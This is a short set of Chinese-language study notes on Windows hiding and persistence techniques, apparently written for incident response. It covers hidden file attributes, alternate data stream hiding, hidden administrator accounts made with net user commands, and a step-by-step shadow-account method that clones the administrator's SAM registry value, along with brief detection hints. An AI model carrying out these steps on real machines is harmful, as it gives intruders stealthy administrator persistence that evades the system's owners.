隐藏文件
①文件属性隐藏
如何排查: 使用dir命令无法看到有特殊属性的文件需使用/a
②真隐藏
相当于给原本的文件增加系统文件属性、存档文件属性、只读文集属性、隐藏文件属性
如何排查: 取消受保护的操作系统文件
③利用ADS隐藏
使用数据流
echo "123">>tet.php:hidden.jpg::$DATA
此时该文件无法通过补全等常规手段查看
如何排查&清理: dir /r可查 或直接删除对应的显示文件,直接删除test.php即可
隐藏账号&克隆账号
net user test$ qaz123 /add
net localgroup administrators test$ /add
添加隐藏账户,并加入管理员组
检查方法:通过D盾查杀工具
如和创建影子账户,创建出的test用户可以已administrator账户的身份登陆
①创建一个账户名为test$
net user test$ mima /add
给sam表分配权限
注册表:REGEDIT 位置:HKEY_LOCAL_MACHINE\SAM\SAM
导出三个表
①administrator用户的值对应的表3.reg
②test$用户的用户表,1.reg
③test$用户值对应的表,2.reg
替换2.reg中的f值为3.reg
导入注册表,并删除test$账户 先删,后导
net user test$ /del
regedit /s 1.reg
regedit /s 2.reg
导入效果
